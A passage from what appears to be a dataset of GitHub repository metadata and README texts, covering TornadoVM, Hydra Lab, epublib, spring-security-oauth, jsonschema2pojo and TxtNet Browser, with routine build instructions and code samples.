keywords = {Java, graal, heterogeneous hardware, openCL, virtual machine},
}
```
Selected publications can be found [here](https://tornadovm.readthedocs.io/en/latest/publications.html).
## 8. Acknowledgments
This work is partially funded by [Intel corporation](https://www.intel.com/content/www/us/en/homepage.html).
In addition, it has been supported by the following EU & UKRI grants (most recent first):
- EU Horizon Europe & UKRI [AERO 101092850](https://cordis.europa.eu/project/id/101092850).
- EU Horizon Europe & UKRI [INCODE 101093069](https://cordis.europa.eu/project/id/101093069).
- EU Horizon Europe & UKRI [ENCRYPT 101070670](https://encrypt-project.eu).
- EU Horizon Europe & UKRI [TANGO 101070052](https://tango-project.eu).
- EU Horizon 2020 [ELEGANT 957286](https://www.elegant-h2020.eu/).
- EU Horizon 2020 [E2Data 780245](https://e2data.eu).
- EU Horizon 2020 [ACTiCLOUD 732366](https://acticloud.eu).
Furthermore, TornadoVM has been supported by the following [EPSRC](https://www.ukri.org/councils/epsrc/) grants:
- [PAMELA EP/K008730/1](http://apt.cs.manchester.ac.uk/projects/PAMELA/).
- [AnyScale Apps EP/L000725/1](https://gow.epsrc.ukri.org/NGBOViewGrant.aspx?GrantRef=EP/L000725/1).
## 9. Contributions and Collaborations
We welcome collaborations! Please see how to contribute to the project in the [CONTRIBUTING](CONTRIBUTING.md) page.
### Write your questions and proposals:
Additionally, you can open new proposals on the GitHub
discussions [page](https://github.com/beehive-lab/TornadoVM/discussions).
Alternatively, you can share a Google document with us.
### Collaborations:
For Academic & Industry collaborations, please contact [here](https://www.tornadovm.org/contact-us).
## 10. TornadoVM Team
Visit our [website](https://tornadovm.org) to meet the [team](https://www.tornadovm.org/about-us).
## 11. Licenses
To use TornadoVM, you can link the TornadoVM API, which is licensed under Apache 2, to your application.
Each Java TornadoVM module is licensed as follows:
| Module | License |
|--------------------------------|---------------------------------------------------------------------------------------------------------------------------------------------------------------|
| Tornado-API | [![License: Apache 2](https://img.shields.io/badge/License-Apache%202.0-red.svg)](https://github.com/beehive-lab/TornadoVM/blob/master/LICENSE_APACHE2) |
| Tornado-Runtime | [![License: GPL v2](https://img.shields.io/badge/License-GPL%20v2-blue.svg)](https://www.gnu.org/licenses/old-licenses/gpl-2.0.en.html) + CLASSPATH Exception |
| Tornado-Assembly | [![License: Apache 2](https://img.shields.io/badge/License-Apache%202.0-red.svg)](https://github.com/beehive-lab/TornadoVM/blob/master/LICENSE_APACHE2) |
| Tornado-Drivers | [![License: GPL v2](https://img.shields.io/badge/License-GPL%20v2-blue.svg)](https://www.gnu.org/licenses/old-licenses/gpl-2.0.en.html) + CLASSPATH Exception |
| Tornado-Drivers-OpenCL-Headers | [![License](https://img.shields.io/badge/License-Apache%202.0-red.svg)](https://github.com/KhronosGroup/OpenCL-Headers/blob/master/LICENSE) |
| Tornado-scripts | [![License: Apache 2](https://img.shields.io/badge/License-Apache%202.0-red.svg)](https://github.com/beehive-lab/TornadoVM/blob/master/LICENSE_APACHE2) |
| Tornado-Annotation | [![License: Apache 2](https://img.shields.io/badge/License-Apache%202.0-red.svg)](https://github.com/beehive-lab/TornadoVM/blob/master/LICENSE_APACHE2) |
| Tornado-Unittests | [![License: Apache 2](https://img.shields.io/badge/License-Apache%202.0-red.svg)](https://github.com/beehive-lab/TornadoVM/blob/master/LICENSE_APACHE2) |
| Tornado-Benchmarks | [![License: Apache 2](https://img.shields.io/badge/License-Apache%202.0-red.svg)](https://github.com/beehive-lab/TornadoVM/blob/master/LICENSE_APACHE2) |
| Tornado-Examples | [![License: Apache 2](https://img.shields.io/badge/License-Apache%202.0-red.svg)](https://github.com/beehive-lab/TornadoVM/blob/master/LICENSE_APACHE2) |
| Tornado-Matrices | [![License: Apache 2](https://img.shields.io/badge/License-Apache%202.0-red.svg)](https://github.com/beehive-lab/TornadoVM/blob/master/LICENSE_APACHE2) |
"
microsoft/HydraLab,main,1062,87,2022-04-28T09:18:16Z,142800,41,Intelligent cloud testing made easy.,azure chatgpt cloud-testing cross-platform developer-tools device-farm e2e-testing mobile-development performance-testing platform-engineering spring-boot test-automation testgpt testing testing-framework ui-testing,"
## What is Hydra Lab?
Hydra Lab is a framework that can help you easily build a cloud-testing platform utilizing the test devices/machines in hand.
Capabilities of Hydra Lab include:
- Scalable test device management under the center-agent distributed design; Test task management and test result visualization.
- Powering [Android Espresso Test](https://developer.android.com/training/testing/espresso), and Appium(Java) test on different platforms: Windows/iOS/Android/Browser/Cross-platform.
- Case-free test automation: Monkey test, Smart exploratory test.
For more details, you may refer to:
- [Introduction: What is Hydra Lab?](https://github.com/microsoft/HydraLab/wiki)
- [How Hydra Lab Empowers Microsoft Mobile Testing and Test Intelligence](https://medium.com/microsoft-mobile-engineering/how-hydra-lab-empowers-microsoft-mobile-testing-e4bd831ecf41)
## Get Started
Please visit our **[GitHub Project Wiki](https://github.com/microsoft/HydraLab/wiki)** to understand the dev environment setup procedure: [Contribution Guideline](CONTRIBUTING.md).
**Supported environments for Hydra Lab agent**: Windows, Mac OSX, and Linux ([Docker](https://github.com/microsoft/HydraLab/blob/main/agent/README.md#run-agent-in-docker)).
**Supported platforms and frameworks matrix**:
| | Appium(Java) | Espresso | XCTest | Maestro | Python Runner |
| ---- |--------------|---- | ---- | ---- | --- |
|Android| ✔ | ✔ | x | ✔ | ✔ |
|iOS| ✔ | x | ✔ | ✔ | ✔ |
|Windows| ✔ | x | x | x | ✔ |
|Web (Browser)| ✔ | x | x | x | ✔ |
### Quick guide on out-of-box Uber docker image
Hydra Lab offers an out-of-box experience of the Docker image, and we call it `Uber`. You can follow the below steps and start your docker container with both a center instance and an agent instance:
**Step 1. Download and install [Docker](https://www.docker.com)**
**Step 2. Download latest Uber Docker image**
```bash
docker pull ghcr.io/microsoft/hydra-lab-uber:latest
```
**This step is necessary.** If you skip it and jump to Step 3, you may end up running a locally cached Docker image with the `latest` tag, if one exists.
**Step 3. Run on your machine**
By default, Hydra Lab will use the local file system as its storage solution, and you may type the following in your terminal to run it:
```bash
docker run -p 9886:9886 --name=hydra-lab ghcr.io/microsoft/hydra-lab-uber:latest
```
> We strongly recommend using [Azure Blob Storage](https://azure.microsoft.com/en-us/products/storage/blobs/) service as the file storage solution, and Hydra Lab has native, consistent, and validated support for it.
**Step 4. Visit the web page and view your connected devices**
> Url: http://localhost:9886/portal/index.html#/ (or your custom port).
Enjoy starting your journey of exploration!
**Step 5. Perform the test procedure with a minimal setup**
Note: For Android, Uber image only supports **Espresso/Instrumentation** test. See the ""User Manual"" section on this page for more features: [Hydra Lab Wikis](https://github.com/microsoft/HydraLab/wiki).
**To run a test with Uber image and local storage:**
- On the front-end page, go to the `Runner` tab and select `HydraLab Client`.
- Click `Run` and change ""Espresso test scope"" to `Test app`, click `Next`.
- Pick an available device, click `Next` again, and click `Run` to start the test.
- When the test is finished, you can view the test result in the `Task` tab on the left navigator of the front-end page.
![Test trigger steps](docs/images/test-trigger-steps.png)
### Build and run Hydra Lab from the source
You can also run the center java Spring Boot service (a runnable Jar) separately with the following commands:
> The build and run process requires JDK 11, NPM, and Android SDK platform-tools to be installed.
**Step 1. Run Hydra Lab center service**
```bash
# In the project root, switch to the react folder to build the Web front.
cd react
npm ci
npm run pub
# Get back to the project root, and build the center runnable Jar.
cd ..
# For the gradlew command, if you are on Windows please replace it with `./gradlew` or `./gradlew.bat`
gradlew :center:bootJar
# Run it, and then visit http://localhost:9886/portal/index.html#/
java -jar center/build/libs/center.jar
# Then visit http://localhost:9886/portal/index.html#/auth to generate a new agent ID and agent secret.
```
> If you encounter the error: `Error: error:0308010C:digital envelope routines::unsupported`, set the System Variable `NODE_OPTIONS` as `--openssl-legacy-provider` and then restart the terminal.
**Step 2. Run Hydra Lab agent service**
```bash
# In the project root
cd android_client
# Build the Android client APK
./gradlew assembleDebug
cp app/build/outputs/apk/debug/app-debug.apk ../common/src/main/resources/record_release.apk
# If you don't have the Android SDK, you can download the prebuilt APK from https://github.com/microsoft/HydraLab/releases
# Back to the project root
cd ..
# In the project root, copy the sample config file and update the:
# YOUR_AGENT_NAME, YOUR_REGISTERED_AGENT_ID and YOUR_REGISTERED_AGENT_SECRET.
cp agent/application-sample.yml application.yml
# Then build an agent jar and run it
gradlew :agent:bootJar
java -jar agent/build/libs/agent.jar
```
**Step 3. Visit http://localhost:9886/portal/index.html#/ and view your connected devices**
### More integration guidelines:
- [Test agent setup](https://github.com/microsoft/HydraLab/wiki/Test-agent-setup)
- [Trigger a test task run in the Hydra Lab test service](https://github.com/microsoft/HydraLab/wiki/Trigger-a-test-task-run-in-the-Hydra-Lab-test-service)
- [Deploy Center Docker Container](https://github.com/microsoft/HydraLab/wiki/Deploy-Center-Docker-Container)
## Contribute
Your contribution to Hydra Lab will make a difference for the entire test automation ecosystem. Please refer to **[CONTRIBUTING.md](CONTRIBUTING.md)** for instructions.
### Contributor Hero Wall:
## Contact Us
You can reach us by [opening an issue](https://github.com/microsoft/HydraLab/issues/new) or [sending us mails](mailto:hydra_lab_support@microsoft.com).
## Microsoft Give Sponsors
Thank you for your contribution to [Microsoft employee giving program](https://aka.ms/msgive) in the name of Hydra Lab:
[@Germey(崔庆才)](https://github.com/Germey), [@SpongeOnline(王创)](https://github.com/SpongeOnline), [@ellie-mac(陈佳佩)](https://github.com/ellie-mac), [@Yawn(刘俊钦)](https://github.com/Aqinqin48), [@White(刘子凡)](https://github.com/jkfhklh), [@597(姜志鹏)](https://github.com/JZP1996), [@HCG(尹照宇)](https://github.com/mahoshojoHCG)
## License & Trademarks
The entire codebase is under [MIT license](https://github.com/microsoft/HydraLab/blob/main/LICENSE).
This project may contain trademarks or logos for projects, products, or services. Authorized use of Microsoft trademarks or logos is subject to and must follow [Microsoft’s Trademark & Brand Guidelines](https://www.microsoft.com/en-us/legal/intellectualproperty/trademarks/usage/general). Use of Microsoft trademarks or logos in modified versions of this project must not cause confusion or imply Microsoft sponsorship. Any use of third-party trademarks or logos are subject to those third-party’s policies.
We use the Microsoft Clarity Analysis Platform for the front-end client data dashboard; please refer to [Clarity Overview](https://learn.microsoft.com/en-us/clarity/setup-and-installation/about-clarity) and https://clarity.microsoft.com/ to learn more.
Instructions to turn off Clarity:
Open [MainActivity](https://github.com/microsoft/HydraLab/blob/main/android_client/app/src/main/java/com/microsoft/hydralab/android/client/MainActivity.java), comment out the line that calls initClarity(), rebuild the Hydra Lab Client APK, and replace the one in the agent resources folder.
[Telemetry/data collection notice](https://docs.opensource.microsoft.com/releasing/general-guidance/telemetry)
"
psiegman/epublib,master,1024,311,2009-11-18T09:37:52Z,2978,86,a java library for reading and writing epub files,,"# epublib
Epublib is a java library for reading/writing/manipulating epub files.
It consists of 2 parts: a core that reads/writes epub and a collection of tools.
The tools contain an epub cleanup tool, a tool to create epubs from html files, and a tool to create an epub from an uncompressed html file.
It also contains a swing-based epub viewer.
![Epublib viewer](http://www.siegmann.nl/wp-content/uploads/Alice%E2%80%99s-Adventures-in-Wonderland_2011-01-30_18-17-30.png)
The core runs on both Android and a standard Java environment. The tools run only on a standard Java environment.
This means that reading/writing epub files works on Android.
## Build status
* Travis Build Status: [![Build Status](https://travis-ci.org/psiegman/epublib.svg?branch=master)](https://travis-ci.org/psiegman/epublib)
## Command line examples
Set the author of an existing epub
java -jar epublib-3.0-SNAPSHOT.one-jar.jar --in input.epub --out result.epub --author Tester,Joe
Set the cover image of an existing epub
java -jar epublib-3.0-SNAPSHOT.one-jar.jar --in input.epub --out result.epub --cover-image my_cover.jpg
## Creating an epub programmatically
```java
package nl.siegmann.epublib.examples;

import java.io.InputStream;
import java.io.FileOutputStream;

import nl.siegmann.epublib.domain.Author;
import nl.siegmann.epublib.domain.Book;
import nl.siegmann.epublib.domain.Metadata;
import nl.siegmann.epublib.domain.Resource;
import nl.siegmann.epublib.domain.TOCReference;
import nl.siegmann.epublib.epub.EpubWriter;

public class Translator {

    private static InputStream getResource( String path ) {
        return Translator.class.getResourceAsStream( path );
    }

    private static Resource getResource( String path, String href ) {
        return new Resource( getResource( path ), href );
    }

    public static void main(String[] args) {
        try {
            // Create new Book
            Book book = new Book();
            Metadata metadata = book.getMetadata();

            // Set the title
            metadata.addTitle(""Epublib test book 1"");

            // Add an Author
            metadata.addAuthor(new Author(""Joe"", ""Tester""));

            // Set cover image
            book.setCoverImage(
                getResource(""/book1/test_cover.png"", ""cover.png"") );

            // Add Chapter 1
            book.addSection(""Introduction"",
                getResource(""/book1/chapter1.html"", ""chapter1.html"") );

            // Add css file
            book.getResources().add(
                getResource(""/book1/book1.css"", ""book1.css"") );

            // Add Chapter 2
            TOCReference chapter2 = book.addSection( ""Second Chapter"",
                getResource(""/book1/chapter2.html"", ""chapter2.html"") );

            // Add image used by Chapter 2
            book.getResources().add(
                getResource(""/book1/flowers_320x240.jpg"", ""flowers.jpg""));

            // Add Chapter2, Section 1
            book.addSection(chapter2, ""Chapter 2, section 1"",
                getResource(""/book1/chapter2_1.html"", ""chapter2_1.html""));

            // Add Chapter 3
            book.addSection(""Conclusion"",
                getResource(""/book1/chapter3.html"", ""chapter3.html""));

            // Create EpubWriter
            EpubWriter epubWriter = new EpubWriter();

            // Write the Book as Epub
            epubWriter.write(book, new FileOutputStream(""test1_book1.epub""));
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
```
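Reading an epub back in is the reverse operation. The following is a minimal sketch that assumes the library's `EpubReader` class and a `getTitles()` accessor mirroring the `addTitle()` call used above:
```java
import java.io.FileInputStream;

import nl.siegmann.epublib.domain.Book;
import nl.siegmann.epublib.epub.EpubReader;

public class Reader {
    public static void main(String[] args) throws Exception {
        // Read the epub produced by the writing example above
        Book book = new EpubReader().readEpub(new FileInputStream(""test1_book1.epub""));

        // List the titles set in the metadata (assumed getter mirroring addTitle above)
        System.out.println(book.getMetadata().getTitles());
    }
}
```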
## Usage in Android
Add the following lines to your `app` module's `build.gradle` file:
```groovy
repositories {
    maven {
        url 'https://github.com/psiegman/mvn-repo/raw/master/releases'
    }
}

dependencies {
    implementation('nl.siegmann.epublib:epublib-core:4.0') {
        exclude group: 'org.slf4j'
        exclude group: 'xmlpull'
    }
    implementation 'org.slf4j:slf4j-android:1.7.25'
}
```
"
Baeldung/spring-security-oauth,master,1963,1951,2016-03-02T09:04:07Z,4300,15,"Just Announced - Learn Spring Security OAuth"": """,oauth spring-security spring-security-oauth,"## Spring Security OAuth
I've just announced a new course, dedicated to exploring the new OAuth2 stack in Spring Security 5 - Learn Spring Security OAuth:
http://bit.ly/github-lsso
## Build the Project
```
mvn clean install
```
## Projects/Modules
This project contains a number of modules, here is a quick description of what each module contains:
- `oauth-rest` - Authorization Server (Keycloak), Resource Server and Angular App based on the new Spring Security 5 stack
- `oauth-jwt` - Authorization Server (Keycloak), Resource Server and Angular App based on the new Spring Security 5 stack, focused on JWT support
- `oauth-jws-jwk-legacy` - Authorization Server and Resource Server for JWS + JWK in a Spring Security OAuth2 Application
- `oauth-legacy` - Authorization Server, Resource Server, Angular and AngularJS Apps for legacy Spring Security OAuth2
## Run the Modules
You can run any sub-module using command line:
```
mvn spring-boot:run
```
If you're using Spring STS, you can also import the modules and run them directly via the Boot Dashboard.
You can then access the UI application - for example the module using the Password Grant - like this:
`http://localhost:8084/`
You can log in using these credentials: username `john`, password `123`.
## Run the Angular 7 Modules
- To run any of the Angular 7 front-end modules (_spring-security-oauth-ui-implicit-angular_, _spring-security-oauth-ui-password-angular_ and _oauth-ui-authorization-code-angular_), we need to build the app first:
```
mvn clean install
```
- Then we need to navigate to our Angular app directory:
```
cd src/main/resources
```
And run the command to download the dependencies:
```
npm install
```
- Finally, we will start our app:
```
npm start
```
- Note: the Angular 7 modules are commented out because they don't build on Jenkins (they need npm installed), but they build properly locally.
- Note for Angular versions < 4.3.0: you should comment out the HttpClient and HttpClientModule imports in app.module and app.service.ts. These versions rely on the HttpModule.
## Using the JS-only SPA OAuth Client
The main purpose of these projects is to analyze how OAuth should be carried out in JavaScript-only Single-Page Applications, using the authorization_code flow with PKCE.
The *clients-SPA-legacy/clients-js-only-react-legacy* project includes a very simple Spring Boot Application serving a couple of separate Single-Page-Applications developed in React.
It includes the following pages:
* a 'Step-By-Step' guide, where we analyze explicitly each step that we need to carry out to obtain an access token and request a secured resource
* a 'Real Case' scenario, where we can log in, and obtain or use secured endpoints (provided by the Auth server and by a Custom server we set up)
* the Article's Example Page, with the exact same code that is shown in the related article
The Step-By-Step guide supports using different providers (Authorization Servers) by just adding (or uncommenting) the corresponding entries in the static/*spa*/js/configs.js.
### The 'Step-by-Step' OAuth Client with PKCE page
After running the Spring Boot Application (a simple *mvn spring-boot:run* command will be enough), we can browse to *http://localhost:8080/pkce-stepbystep/index.html* and follow the steps to find out what it takes to obtain an access token using the Authorization Code with PKCE Flow.
When prompted with the login form, we might need to create a user for our application first.
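The key client-side step in that flow is deriving the code challenge from a freshly generated code verifier (the S256 method from RFC 7636). Here is a minimal Java sketch of that derivation, purely for illustration and separate from the project's JavaScript code:
```java
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.security.SecureRandom;
import java.util.Base64;

public class PkceExample {
    public static void main(String[] args) throws Exception {
        // code_verifier: a high-entropy random string, base64url-encoded without padding
        byte[] random = new byte[32];
        new SecureRandom().nextBytes(random);
        String verifier = Base64.getUrlEncoder().withoutPadding().encodeToString(random);

        // code_challenge: base64url(SHA-256(code_verifier)), sent on the authorization request
        byte[] digest = MessageDigest.getInstance(""SHA-256"")
                .digest(verifier.getBytes(StandardCharsets.US_ASCII));
        String challenge = Base64.getUrlEncoder().withoutPadding().encodeToString(digest);

        System.out.println(""code_verifier:  "" + verifier);
        System.out.println(""code_challenge: "" + challenge);
    }
}
```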
### The 'Real-Case' OAuth Client with PKCE page
To use all the features contained in the *http://localhost:8080/pkce-realcase/index.html* page, we'll need to first start the resource server (clients-SPA-legacy/oauth-resource-server-auth0-legacy).
In this page, we can:
* List the resources in our resource server (public, no permissions needed)
* Add resources (we're asked for the permissions to do that when logging in; for simplicity's sake, we just request the existing 'profile' scope)
* Remove resources (we actually can't accomplish this task, because the resource server requires the application to have permissions that were not included in the existing scopes)
"
joelittlejohn/jsonschema2pojo,master,6145,1642,2013-06-22T22:28:53Z,11783,209,"Generate Java types from JSON or JSON Schema and annotate those types for data-binding with Jackson, Gson, etc",ant-task gradle-plugin gson jackson java json json-schema maven-plugin,"# jsonschema2pojo [![Build Status](https://github.com/joelittlejohn/jsonschema2pojo/actions/workflows/ci.yml/badge.svg?query=branch%3Amaster)](https://github.com/joelittlejohn/jsonschema2pojo/actions/workflows/ci.yml?query=branch%3Amaster) [![Maven Central](https://maven-badges.herokuapp.com/maven-central/org.jsonschema2pojo/jsonschema2pojo/badge.svg)](http://search.maven.org/#search%7Cga%7C1%7Cg%3A%22org.jsonschema2pojo%22)
_jsonschema2pojo_ generates Java types from JSON Schema (or example JSON) and can annotate those types for data-binding with Jackson 2.x or Gson.
### [Try jsonschema2pojo online](http://jsonschema2pojo.org/) or `brew install jsonschema2pojo`
You can use jsonschema2pojo as a Maven plugin, an Ant task, a command line utility, a Gradle plugin or embedded within your own Java app. The [Getting Started](https://github.com/joelittlejohn/jsonschema2pojo/wiki/Getting-Started) guide will show you how.
A very simple Maven example:
```xml
<plugin>
    <groupId>org.jsonschema2pojo</groupId>
    <artifactId>jsonschema2pojo-maven-plugin</artifactId>
    <version>1.2.1</version>
    <configuration>
        <sourceDirectory>${basedir}/src/main/resources/schema</sourceDirectory>
        <targetPackage>com.example.types</targetPackage>
    </configuration>
    <executions>
        <execution>
            <goals>
                <goal>generate</goal>
            </goals>
        </execution>
    </executions>
</plugin>
```
A very simple Gradle example:
```groovy
plugins {
id ""java""
id ""org.jsonschema2pojo"" version ""1.2.1""
}
repositories {
mavenCentral()
}
dependencies {
implementation 'com.fasterxml.jackson.core:jackson-databind:2.15.2'
}
jsonSchema2Pojo {
targetPackage = 'com.example'
}
```
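The generated types are plain annotated Java classes, so they can be used directly with a binding library such as Jackson. The snippet below is only an illustration: `Person` is a hypothetical, hand-written stand-in for a class jsonschema2pojo would generate from a simple schema.
```java
import com.fasterxml.jackson.databind.ObjectMapper;

public class GeneratedTypeDemo {

    // Hypothetical stand-in for a class generated by jsonschema2pojo.
    public static class Person {
        public String firstName;
        public Integer age;
    }

    public static void main(String[] args) throws Exception {
        Person person = new Person();
        person.firstName = ""Ada"";
        person.age = 36;

        // Jackson data binding works on the generated type out of the box.
        String json = new ObjectMapper().writeValueAsString(person);
        System.out.println(json);
    }
}
```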
Useful pages:
* **[Getting started](https://github.com/joelittlejohn/jsonschema2pojo/wiki/Getting-Started)**
* **[How to contribute](https://github.com/joelittlejohn/jsonschema2pojo/blob/master/CONTRIBUTING.md)**
* [Reference](https://github.com/joelittlejohn/jsonschema2pojo/wiki/Reference)
* [Latest Javadocs](https://joelittlejohn.github.io/jsonschema2pojo/javadocs/1.2.1/)
* [Documentation for the Maven plugin](https://joelittlejohn.github.io/jsonschema2pojo/site/1.2.1/generate-mojo.html)
* [Documentation for the Gradle plugin](https://github.com/joelittlejohn/jsonschema2pojo/tree/master/jsonschema2pojo-gradle-plugin#usage)
* [Documentation for the Ant task](https://joelittlejohn.github.io/jsonschema2pojo/site/1.2.1/Jsonschema2PojoTask.html)
Project resources:
* [Downloads](https://github.com/joelittlejohn/jsonschema2pojo/releases)
* [Mailing list](https://groups.google.com/forum/#!forum/jsonschema2pojo-users)
Special thanks:
* unkish
* Thach Hoang
* Dan Cruver
* Ben Manes
* Sam Duke
* Duane Zamrok
* Christian Trimble
* YourKit, who support this project through a free license for the [YourKit Java Profiler](https://www.yourkit.com/java/profiler).
Licensed under the [Apache License, Version 2.0](http://www.apache.org/licenses/LICENSE-2.0).
"
lukeaschenbrenner/TxtNet-Browser,master,1018,25,2022-03-22T22:50:34Z,18930,12,An app that lets you browse the web over SMS,,"# TxtNet Browser
### Browse the Web over SMS, no WiFi or Mobile Data required!
> **⏸️ Development of this project is currently on hiatus due to other ongoing commitments. However, fixes and improvements are planned when development continues in Q1 2024! ⏸️**
TxtNet Browser is an Android app that allows anyone around the world to browse the web without a mobile data connection! It uses SMS as a medium of transmitting HTTP requests to a server where a pre-parsed HTML response is compressed using Google's [Brotli](https://github.com/google/brotli) compression algorithm and encoded using a custom Base-114 encoding format (based on [Basest](https://github.com/saxbophone/basest-python)).
In addition, any user can act as a server using their own phone's primary phone number and a Wi-Fi/data connection at the press of a button, allowing for peer-to-peer distributed networks.
## Download
### See the **[releases page](https://github.com/lukeaschenbrenner/TxtNet-Browser/releases)** for an APK download of the TxtNet Browser client. A Google Play release is coming soon.
TxtNet Browser is currently compatible with Android 4.4-13+.
## Running Server Instances (uptime not guaranteed)
| Country | Phone Number | Notes |
| :--- | :----: | :--- |
| United States | +1(913)203-2719 | Supports SMS to all +1 (US/Canada) numbers in addition to [these countries](https://github.com/lukeaschenbrenner/TxtNet-Browser/issues/2#issuecomment-1510506701) |
| | | |
Let me know if you are interested in hosting a server instance for your area!
> ⚠️**Please note**: All web traffic should be considered unencrypted, as all requests are made over SMS and received in plaintext by the server!
## How it works (client)
This app uses a permission that allows a broadcast receiver to receive and parse incoming SMS messages without the need for the app to be registered as the user's default messaging app. While granting an app SMS permissions poses a security concern, the code for this app is open source and all code involving the use of internet permissions is compartmentalized to the server module. This ensures that unless the app is set up to be a server, no internet traffic is transmitted. In addition, as the client, SMS messages are only programmatically sent to and received from a registered server phone number.
The app communicates with a ""server phone number"", which is a phone number controlled by a ""server host"" that communicates directly over SMS using Android's SMS APIs. Each URL request is sent, encoded in a custom base 114, to the server. Usually, this only requires 1 SMS, but just in case, each message is prepended with an order specifier. When the server receives a request, it uses an Android WebView component to programmatically request the website in a manner that simulates a regular request, to avoid restrictions some services (such as Cloudflare) place on HTTP clients. By doing this, any Javascript can also execute on the website, allowing content to be dynamically loaded into the HTML if needed. Once the page is loaded, only the HTML is transferred back to the recipient device. The HTML is stripped of unnecessary tags and attributes, compressed into raw bytes, and then encoded. Once encoded, the messages are split into 160 character numbered segments (maximizing the [GSM-7 standard](https://en.wikipedia.org/wiki/GSM_03.38) SMS size) and sent to the client app for parsing and displaying.
Side note: Compression savings have been estimated to be an average of 20% using Brotli, but oftentimes it can save much more! For example, the website `example.com` in stripped HTML is 285 characters, but only requires 2 SMS messages (189 characters) to receive. Even including the 225% overhead in data transmission, it is still more efficient!
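To make the segmentation step concrete, here is a rough, illustrative Java sketch (not the app's actual implementation) of splitting an already-encoded payload into numbered 160-character segments, where the numeric prefix stands in for the order specifier described above:
```java
import java.util.ArrayList;
import java.util.List;

public class SmsSegmenter {

    // Split an encoded payload into segments that each fit in a single GSM-7 SMS.
    // The ""index:"" prefix is a hypothetical order specifier so the receiver can
    // reassemble segments that arrive out of order.
    static List<String> segment(String encodedPayload, int maxSmsChars) {
        List<String> segments = new ArrayList<>();
        int index = 1;
        int pos = 0;
        while (pos < encodedPayload.length()) {
            String prefix = index + "":"";
            int chunk = Math.min(maxSmsChars - prefix.length(), encodedPayload.length() - pos);
            segments.add(prefix + encodedPayload.substring(pos, pos + chunk));
            pos += chunk;
            index++;
        }
        return segments;
    }

    public static void main(String[] args) {
        String payload = ""abcdefghij"".repeat(40); // stand-in for Base-114 encoded HTML
        segment(payload, 160).forEach(System.out::println);
    }
}
```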
#### Why encode the HTML in the first place?
SMS was created in 1984, and was created to utilize the extra bytes from the data channels in phone signalling. It was originally conceived to only support 128 characters in a 7-bit alphabet. When further characters were required to support a subset of the UTF-8 character set, a new standard called UCS-2 was created. Still limited by the 160 bytes available, UCS-2 supports more characters (many of which show up in HTML documents) but limits SMS sizes to 70 characters per SMS. By encoding all data in GSM-7, more data can be sent per SMS message than sending the raw HTML over SMS. It is possible that it may be even more efficient to create an encoding system using all the characters available in UCS-2, but this limits compatibility and is out of the scope of the project.
## Server Hosting
TxtNet Browser has been rewritten to include a built-in server hosting option inside the app. Instead of the now-deprecated Python server using a paid SMS API, any user can now act as a server host, allowing for distributed communication.
To enable the background service, tap on the overflow menu and select ""TxtNet Server Hosting"". Once the necessary permissions are granted, you can press on the ""Start Service"" toggle to initialize a background service.
TxtNet Server uses your primary mobile number associated with the active carrier subscription SIM as a number that others can add and connect to.
Please note that this feature is still in early stages of development and likely has many issues. Please submit issue reports for any problems you encounter.
For Android 4.4-6.0, you will need to run adb commands one time as specified in the app. For Android 6.0-10.0, you may also use Shizuku, but a PC will still be required once. For Android 11+, no PC is required to activate the server using [Shizuku](https://shizuku.rikka.app/guide/setup/).
##### Desktop Server Installation (Deprecated)
The current source code is pointed at my own server, using a Twilio API with credits I have purchased. If you would like to run your own server, follow the instructions below:
1. Register for an account at [Twilio](https://twilio.com/), purchase a toll-free number with SMS capability, and purchase credits. (This project will not work with Twilio free accounts)
2. Create a Twilio application for the number.
3. Sign up for an [ngrok](http://ngrok.com/) account and download the ngrok application
4. Open the ngrok directory and run this command: `./ngrok tcp 5000`
5. Visit the [active numbers](https://console.twilio.com/US1/develop/phone-numbers/manage/incoming) page and add the ngrok url to the ""A Message Comes In"" section after selecting ""webhook"". For example: ""https://xyz.ngrok.io/receive_sms""
6. Download the TxtNet Browser [server script](https://github.com/lukeaschenbrenner/TxtNet-Browser/blob/master/SMS_Server_Twilio.py) and install all the required modules using ""pip install x""
7. Add your Twilio API ID and Key into your environment variables, and run the script! `python3 ./SMS_Server_Twilio.py`
8. In the TxtNet Browser app, press the three dots and press ""Change Server Phone Number"". Enter in the phone number you purchased from Twilio and press OK!
## FAQ/Troubleshooting
Bugs:
- Many carriers are unnecessarily rate limiting incoming text messages, so large pages may look as though they have ""stalled"" while loading. As of now the only way to fix this is to wait!
- In congested networks, it's possible for a mobile carrier to drop one or more SMS messages before they are received by the client. Currently, the app has no logic to mitigate this issue, so any websites that have stalled for a significant amount of time should be requested again.
- In Android 12 (or possibly a new version of Google Messages?), there is a new and ""improved"" message blocking feature. This results in no SMS messages getting through when a number is blocked, which makes the blocking feature of TxtNet Browser break the app! Instead of blocking messages, to get around this ""feature"", you can silence message notifications from the server phone number.
## Screenshots (TxtNet 1.0)
##### Demo (TxtNet 1.0)
https://user-images.githubusercontent.com/5207700/191133921-ee39c87a-c817-4dde-b522-cb52e7bf793b.mp4
> Demo video shown above
## Development
### 🚧 **If you are skilled in Android UI design, your help would be greatly appreciated!** 🚧 A consistent theme and dark mode would be great additions to this app.
Feel free to submit pull requests! I am a second-year CS student with basic knowledge of Android Development and Server Development, and greatly appreciate help and support from the community.
## Future Impact
My long-term goal with this project is to eventually reach communities where such a service would be practically useful, which may include:
- Those in countries with a low median income and prohibitively expensive data plans
- Those who live under oppressive governments, with near impenetrable internet censorship
If you think you might be able to help funding a local country code phone number or server, or have any other ideas, please get in contact with the email in my profile description!
## License
GPLv3 - See LICENSE.md
## Credits
Thank you to everyone who has contributed to the libraries used by this app, especially Brotli and Basest. Special thanks goes to [Coldsauce](https://github.com/ColdSauce), whose original project [Cosmos Browser](https://github.com/ColdSauce/CosmosBrowserAndroid) was the original inspiration for this project!
My original reply to his Hacker News comment is [here](https://news.ycombinator.com/item?id=30685223#30687202).
In addition, I would like to thank [Zachary Wander](https://www.xda-developers.com/implementing-shizuku/) from XDA for their excellent Shizuku implementation tutorial and [Aayush Atharva](https://github.com/hyperxpro/Brotli4j/) for the amazing foundation they created with Brotli4J, allowing for a streamlined forking process to create the library BrotliDroid used in this app.
"
microcks/microcks,master,1196,191,2015-02-23T15:46:09Z,5464,84,Kubernetes native tool for mocking and testing API and micro-services. Microcks is a Cloud Native Computing Foundation sandbox project 🚀,api api-testing asyncapi asyncapi-specification cncf cncf-project event-driven graphql kubernetes mock mock-server mocking openapi openapi-tooling openapi3 openapi31 postman-collection swagger swagger2 testing,"
